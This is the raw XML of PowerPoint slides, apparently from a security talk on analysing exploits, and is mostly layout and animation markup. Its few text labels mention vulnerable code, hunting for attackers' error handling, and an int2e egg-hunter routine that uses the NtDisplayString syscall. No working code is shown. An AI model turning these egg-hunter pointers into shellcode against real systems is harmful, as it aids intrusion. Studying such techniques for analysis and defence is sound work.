          <p:cNvPr id="79" name="Picture 6" descr="C:\Users\mattt\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DA1L80Y3\MPj04000160000[1].jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="150C17"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="150C17">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2072657" y="3682544"/>
            <a:ext cx="1010176" cy="854765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Rectangle 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072657" y="4226485"/>
            <a:ext cx="1010176" cy="31082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defTabSz="932563"/>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="505050"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
              </a:rPr>
              <a:t> code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Rectangle 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2150363"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2" name="Rectangle 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2150363"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3" name="Rectangle 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2150363"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4" name="Rectangle 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2150363"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5" name="Rectangle 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2150363"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6" name="Rectangle 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2694304"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7" name="Rectangle 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2694304"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8" name="Rectangle 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2694304"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9" name="Rectangle 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2694304"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0" name="Rectangle 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2694304"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1" name="Rectangle 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238245"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2" name="Rectangle 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238245"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4" name="Rectangle 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238245"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5" name="Rectangle 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238245"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6" name="Rectangle 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782188"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7" name="Rectangle 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782188"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8" name="Rectangle 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782188"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9" name="Rectangle 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782188"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0" name="Rectangle 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3782188"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1" name="Rectangle 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326129"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2" name="Rectangle 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326129"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3" name="Rectangle 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326129"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4" name="Rectangle 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326129"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5" name="Rectangle 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326129"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7" name="Title 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6218237" y="1088380"/>
            <a:ext cx="4429238" cy="1445653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="93247" tIns="46623" rIns="93247" bIns="46623" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="932418">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4080" dirty="0">
              <a:solidFill>
                <a:srgbClr val="505050"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238245"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6" name="Explosion 1 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2305774" y="4071074"/>
            <a:ext cx="233118" cy="233118"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal1">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>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63"/>
            <a:endParaRPr lang="en-US" sz="1836">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2" descr="http://support.microsoft.com/library/images/support/kbgraphics/public/EN-US/IE5x_NewErrorReportingDialog.gif"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1839539" y="1973014"/>
            <a:ext cx="2886416" cy="1942648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C503D0D9-20ED-DC15-4576-7E9CE5555332}"/>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9225254" y="1891326"/>
            <a:ext cx="1026371" cy="15262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979309E-7940-B261-4619-B9294E11E2C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10675780" y="4877147"/>
            <a:ext cx="1380067" cy="1086752"/>
            <a:chOff x="10675780" y="4877147"/>
            <a:chExt cx="1380067" cy="1086752"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EFD56B9-6094-A54A-8D1F-85899A4B894D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="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t="18568"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="11158381" y="4877147"/>
              <a:ext cx="897466" cy="1086752"/>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F168B756-DF6E-9198-FA4D-13EFBD92A8F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1265633" flipH="1">
              <a:off x="10675780" y="5154264"/>
              <a:ext cx="965200" cy="584200"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="D83B0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870423F-479E-660B-0D96-1669C9E66B7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9501631" y="5786963"/>
            <a:ext cx="1101361" cy="1033297"/>
            <a:chOff x="9501631" y="5786963"/>
            <a:chExt cx="1101361" cy="1033297"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C44B475-F618-7A3D-7D4E-FB0F749140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4106"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9900259" y="6236188"/>
              <a:ext cx="702733" cy="584072"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Arc 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99A2DEAD-A385-108E-FB10-39BC983DCEDA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="605240" flipH="1" flipV="1">
              <a:off x="9501631" y="5786963"/>
              <a:ext cx="965200" cy="584200"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="D83B0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615342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slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="10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childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.28389E-6 -2.04267E-6 C -0.00574 -0.1153 -0.01148 -0.23014 0.00677 -0.26282 C 0.02502 -0.2955 0.06715 -0.24535 0.10953 -0.19541 " pathEditMode="relative" rAng="0" ptsTypes="AAA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="106"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="5183" y="-13663"/>
                                    </p:animMotion>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9218"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9218"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9218"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9218"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="360"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9218"/>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up)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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0">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0">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0">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0">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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0">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>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0">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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0">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0">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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0">
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70">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70">
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70">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0">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70">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70">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>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06" grpId="0" animBg="1"/>
      <p:bldP spid="10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0C7E-D85A-C08F-3DD8-2FE9CD30AE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hunt their Professionalism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{253418C5-E34C-B324-8D08-1CCF4E27FDAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595914" y="1463669"/>
            <a:ext cx="11239789" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for error handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26BEB3D7-48B7-AFFD-857A-A6A2801D04F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="595914" y="1364189"/>
            <a:ext cx="5009256" cy="3822250"/>
            <a:chOff x="595914" y="1364189"/>
            <a:chExt cx="5009256" cy="3822250"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29098FDB-5880-61EA-1FE2-52A0DE5D43BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="595914" y="2214486"/>
              <a:ext cx="4267419" cy="2971953"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rounded Rectangular Callout 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ABD041E-0666-C994-C570-2241D503D7F2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4328330" y="1364189"/>
              <a:ext cx="1276840" cy="876067"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -58280"/>
                <a:gd name="adj2" fmla="val 111481"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FCD116">
                <a:tint val="65000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FCD116"/>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Compare memory with Egg value</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle: Rounded Corners 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{574F3003-AAAA-5A14-B654-E2A439044503}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2523067" y="2781067"/>
              <a:ext cx="2192866" cy="580200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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7" name="Graphic 16" descr="Warning with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72AB518D-98BD-F0A0-9E6C-10613B0ED5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7675" y="2702718"/>
              <a:ext cx="707495" cy="707495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639BD0A6-63BB-54D8-ACB8-402C78F00D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5896857" y="2240256"/>
            <a:ext cx="6413675" cy="4582571"/>
            <a:chOff x="5896857" y="2240256"/>
            <a:chExt cx="6413675" cy="4582571"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A827E083-15A2-D078-F73B-9D3BCF9B19FC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId5"/>
            <a:srcRect b="50331"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6155775" y="2240256"/>
              <a:ext cx="5112389" cy="2728766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rounded Rectangular Callout 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{032AEF58-348C-B4E1-C368-40A31C6C0C9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10275996" y="2502169"/>
              <a:ext cx="1276840" cy="876067"/>
            </a:xfrm>
            <a:prstGeom prst="wedgeRoundRectCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val -58280"/>
                <a:gd name="adj2" fmla="val 111481"/>
                <a:gd name="adj3" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FCD116">
                <a:tint val="65000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FCD116"/>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Int2e egg hunt routine</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle: Rounded Corners 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAF0D4A0-7FA8-28CD-B70D-69B5AC113639}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8186061" y="3897756"/>
              <a:ext cx="2192866" cy="563266"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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3F03EB08-029F-D295-8759-0819140DE733}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5896857" y="5068501"/>
              <a:ext cx="6413675" cy="1754326"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="95000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>0x43 == ordinal for </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>NtDisplayString</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> kernel function</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>int2E calls </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
